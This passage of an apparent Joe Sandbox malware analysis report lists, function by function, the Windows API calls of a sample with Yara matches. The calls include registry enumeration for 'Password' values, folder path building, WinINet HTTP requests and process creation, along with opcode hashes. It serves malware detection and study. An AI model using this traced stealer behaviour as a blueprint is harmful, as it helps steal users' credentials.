                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                  • String ID: a+A$a+A
                                                                                  • API String ID: 4287319946-2847607090
                                                                                  • Opcode ID: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                                                                  • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                                                                                  • Opcode Fuzzy Hash: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                                                                  • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                                                                                  Function 00B10CC7 Relevance: 18.2, APIs: 12, Instructions: 205stringprocesssynchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                  • memset.MSVCRT ref: 00B10E83
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B10E9C
                                                                                  • lstrcat.KERNEL32(?,00420D7C), ref: 00B10EAE
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B10EC4
                                                                                  • lstrcat.KERNEL32(?,00420D80), ref: 00B10ED6
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B10EEF
                                                                                  • lstrcat.KERNEL32(?,00420D84), ref: 00B10F01
                                                                                  • lstrlen.KERNEL32(?), ref: 00B10F0E
                                                                                  • memset.MSVCRT ref: 00B10F34
                                                                                  • memset.MSVCRT ref: 00B10F48
                                                                                    • Part of subcall function 00B1AA87: lstrlen.KERNEL32(00B0516C,?,?,00B0516C,00420DDE), ref: 00B1AA92
                                                                                    • Part of subcall function 00B1AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 00B1AAEC
                                                                                    • Part of subcall function 00B18DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B01660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B18DED
                                                                                    • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
                                                                                    • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                    • Part of subcall function 00B1AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B1AA4D
                                                                                    • Part of subcall function 00B19927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00B10DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 00B19948
                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00B10FC1
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B10FCD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                                                  • String ID:
                                                                                  • API String ID: 1395395982-0
                                                                                  • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                                                                  • Instruction ID: 3be2872bc563f7c945eb68cd22dee43c13382dc5473b67ebb9f5b5f673543e85
                                                                                  • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                                                                  • Instruction Fuzzy Hash: 898184B5511218ABCB14EBA0DD92FED77B9AF44704F8041D9B30966082EE747BC8CF5A
                                                                                  Function 00B10CB6 Relevance: 18.2, APIs: 12, Instructions: 185stringprocesssynchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                  • memset.MSVCRT ref: 00B10E83
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B10E9C
                                                                                  • lstrcat.KERNEL32(?,00420D7C), ref: 00B10EAE
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B10EC4
                                                                                  • lstrcat.KERNEL32(?,00420D80), ref: 00B10ED6
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B10EEF
                                                                                  • lstrcat.KERNEL32(?,00420D84), ref: 00B10F01
                                                                                  • lstrlen.KERNEL32(?), ref: 00B10F0E
                                                                                  • memset.MSVCRT ref: 00B10F34
                                                                                  • memset.MSVCRT ref: 00B10F48
                                                                                    • Part of subcall function 00B1AA87: lstrlen.KERNEL32(00B0516C,?,?,00B0516C,00420DDE), ref: 00B1AA92
                                                                                    • Part of subcall function 00B1AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 00B1AAEC
                                                                                    • Part of subcall function 00B18DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B01660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B18DED
                                                                                    • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
                                                                                    • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                    • Part of subcall function 00B1AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B1AA4D
                                                                                    • Part of subcall function 00B19927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00B10DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 00B19948
                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00B10FC1
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B10FCD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                                                  • String ID:
                                                                                  • API String ID: 1395395982-0
                                                                                  • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                                                                  • Instruction ID: fcd550830cc83d550b96cdc0740e81d452c81f9f3efe10ae1468fc936f70fc5c
                                                                                  • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                                                                  • Instruction Fuzzy Hash: CC61A2B5511218ABCB14EBA0DD86FED7778AF44704F8041E9B70966082EE746BC8CF5A
                                                                                  Function 00B04AE7 Relevance: 17.0, APIs: 11, Instructions: 479networkstringfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00B1AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B1AA4D
                                                                                    • Part of subcall function 00B04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B04A51
                                                                                    • Part of subcall function 00B04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B04A68
                                                                                    • Part of subcall function 00B04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B04A7F
                                                                                    • Part of subcall function 00B04A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B04AA0
                                                                                    • Part of subcall function 00B04A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B04AB0
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00B04B7C
                                                                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 00B04BA1
                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B04D21
                                                                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 00B0504F
                                                                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00B0506B
                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00B0507F
                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00B050B0
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00B05114
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00B0512C
                                                                                  • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 00B04D7C
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                    • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
                                                                                    • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00B05136
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                                                  • String ID:
                                                                                  • API String ID: 2402878923-0
                                                                                  • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                                                                  • Instruction ID: 275390381ff466913b49cdb09c088d6a4d9a8a475106f5e618b36e3a6885c700
                                                                                  • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                                                                  • Instruction Fuzzy Hash: B112AB72911218AACB15EB90DD92EEEB7B9AF15700F9041D9B10A72491EF743FC8CF52
                                                                                  Function 00B064E7 Relevance: 16.7, APIs: 11, Instructions: 191networkfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00B1AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B1AA4D
                                                                                    • Part of subcall function 00B04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B04A51
                                                                                    • Part of subcall function 00B04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B04A68
                                                                                    • Part of subcall function 00B04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B04A7F
                                                                                    • Part of subcall function 00B04A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B04AA0
                                                                                    • Part of subcall function 00B04A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B04AB0
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                  • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 00B06548
                                                                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 00B0656A
                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B0659C
                                                                                  • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 00B065EC
                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00B06626
                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B06638
                                                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00B06664
                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00B066D4
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00B06756
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00B06760
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00B0676A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 3074848878-0
                                                                                  • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                                                                  • Instruction ID: ace687d510e1ff4e87dbc515d438c415734849cfc91d97711a65686ad2b3b80e
                                                                                  • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                                                                  • Instruction Fuzzy Hash: 79715C75A40218ABDB24DBA0DC89BEE7BB5FF44700F508199F50A6B1D0DBB56E84CF42
                                                                                  Function 00B19277 Relevance: 16.7, APIs: 11, Instructions: 184COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00B192D3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateGlobalStream
                                                                                  • String ID:
                                                                                  • API String ID: 2244384528-0
                                                                                  • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                                                                  • Instruction ID: f14824274ee7e7863aa41c7bc9f1bc860cd5ad1cf498960c9dc811907fdd4a45
                                                                                  • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                                                                  • Instruction Fuzzy Hash: DC711CB9A40208ABDB14DFE4DC95FEEBBB9FF48300F108548F515A7290DB34A945CB61
                                                                                  Function 004170D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 136COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                                                                                  • memset.MSVCRT ref: 0041716A
                                                                                  • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                                                                                  Strings
                                                                                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                                                                                  • sA, xrefs: 00417111
                                                                                  • sA, xrefs: 004172AE, 00417179, 0041717C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: OpenProcesslstrcpymemset
                                                                                  • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                                                  • API String ID: 224852652-2614523144
                                                                                  • Opcode ID: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                                                                  • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                                                                                  • Opcode Fuzzy Hash: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                                                                  • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                                                                                  Function 004075D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                                                                                    • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                                                                    • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                                                                    • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                                                                    • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                                                                    • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                                                                  • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                                                                                  • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                                                                                  • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                                                                                  • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                                                                                  • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                                                                                  • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                                                                                  • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                                                                                  • task.LIBCPMTD ref: 004076FB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                                                  • String ID: :
                                                                                  • API String ID: 3191641157-3653984579
                                                                                  • Opcode ID: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                                                                  • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                                                                                  • Opcode Fuzzy Hash: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                                                                  • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                                                                                  Function 00B11612 Relevance: 15.2, APIs: 10, Instructions: 205stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • lstrcpy.KERNEL32(?,?), ref: 00B11642
                                                                                    • Part of subcall function 00B19047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B19072
                                                                                    • Part of subcall function 00B194C7: StrStrA.SHLWAPI(?,?), ref: 00B194D3
                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B1167E
                                                                                    • Part of subcall function 00B194C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 00B194F7
                                                                                    • Part of subcall function 00B194C7: lstrlen.KERNEL32(?), ref: 00B1950E
                                                                                    • Part of subcall function 00B194C7: wsprintfA.USER32 ref: 00B1952E
                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B116C6
                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B1170E
                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B11755
                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B1179D
                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B117E5
                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B1182C
                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B11874
                                                                                    • Part of subcall function 00B1AA87: lstrlen.KERNEL32(00B0516C,?,?,00B0516C,00420DDE), ref: 00B1AA92
                                                                                    • Part of subcall function 00B1AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 00B1AAEC
                                                                                  • strtok_s.MSVCRT ref: 00B119B7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 4276352425-0
                                                                                  • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                                                                  • Instruction ID: 8ff0994e12e337c0c577fe00bc5d7f7073759cdd47d315d728255e437861d26d
                                                                                  • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                                                                  • Instruction Fuzzy Hash: 977170B6951118ABCB14FBA0DC99EEE73B9AF64300F4049D8B10DA3141EA75ABC4CF61
                                                                                  Function 004072D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00407314
                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                                                                  • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                                                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                                                                    • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                                                                                  • task.LIBCPMTD ref: 00407555
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                                                  • String ID: Password
                                                                                  • API String ID: 2698061284-3434357891
                                                                                  • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                                                  • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                                                                                  • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                                                  • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                                                                                  Function 00414780 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • lstrcatA.KERNEL32(?,00909B30,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB
                                                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414801
                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00414820
                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00414834
                                                                                  • lstrcatA.KERNEL32(?,008D5E28), ref: 00414847
                                                                                  • lstrcatA.KERNEL32(?,?), ref: 0041485B
                                                                                  • lstrcatA.KERNEL32(?,0090A1D0), ref: 0041486F
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                                                                    • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                                                                    • Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
                                                                                    • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                                                                                    • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                                                  • String ID: 0aA
                                                                                  • API String ID: 167551676-2786531170
                                                                                  • Opcode ID: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
